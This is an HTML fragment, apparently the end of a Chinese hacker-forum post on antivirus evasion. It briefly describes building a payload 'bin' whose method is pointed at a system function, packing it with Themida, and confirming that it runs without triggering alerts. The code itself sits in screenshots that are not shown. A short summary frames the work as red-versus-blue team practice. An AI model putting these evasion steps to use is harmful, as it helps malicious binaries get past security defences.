title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/8c61a999ac57759c6b8d9cf7e7bdeec6.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">创建 bin 文件并将其方法指定成系统的 function。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/14734e048cc6c87e7c6cf21fb82d3c6a.png"></span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/b5525acd559b2e7180b071094eabb258.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">最后使用 themdia 加壳后再运行。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width: 100%; cursor: pointer; opacity: 1;" src="https://www.ihonker.org/data/attachment/forum/202103/05/6a6832dd38fb8c770673068d4d2dbc12.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="font-size: 15px;color: rgb(88, 88, 88);font-family: 宋体, SimSun;">成功运行无报警。</span></p><p style="text-align: center;"><span><img title="双击删除图片" class="onloadimg" style="max-width:100%;" src="https://www.ihonker.org/data/attachment/forum/202103/05/add04a9a8442a19f9cfb567c1bb84c2e.png"></span></p><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><br></p><section data-tools="135编辑器" data-id="38806" data-color="#ef7060" style="font-size: 16px;"><section style="border-bottom: 4px solid rgb(221, 221, 221);margin-top: 10px;margin-bottom: 10px;text-align: left;"><section data-bcless="darken" style="border-bottom: 8px solid rgb(51, 51, 51);border-top-color: rgb(51, 51, 51);border-right-color: rgb(51, 51, 51);border-left-color: rgb(51, 51, 51);font-size: 14px;line-height: 20px;display: inline-block;margin-bottom: -5px;color: inherit;"><p style="border-color: #ddd;color: #ddd;font-size: 18px;line-height: 1.5em;background-color: #fefefe;"><span style="color: #333333;"><strong data-brushtype="text" style="border-color: #ddd;color: inherit;" hm_fix="174:287">总结</strong></span></p></section></section></section><p style="orphans: 4;margin: 0.8em 5px;white-space: pre-wrap;font-size: 16px;line-height: 1.75em;letter-spacing: 2.5px;font-family: Helvetica, Arial, sans-serif;"><span style="color: rgb(88, 88, 88);font-size: 15px;caret-color: red;font-family: 宋体, SimSun;">随着 AV 查杀,态势行为特征扫描的发展,利用的难度也越来越大,我们也需要不断提高自身的姿势水平,学习更好的方法来进行红蓝对抗。</span></p></span></span></code></pre></section></section><code>
</code></section></div>
页:
[1]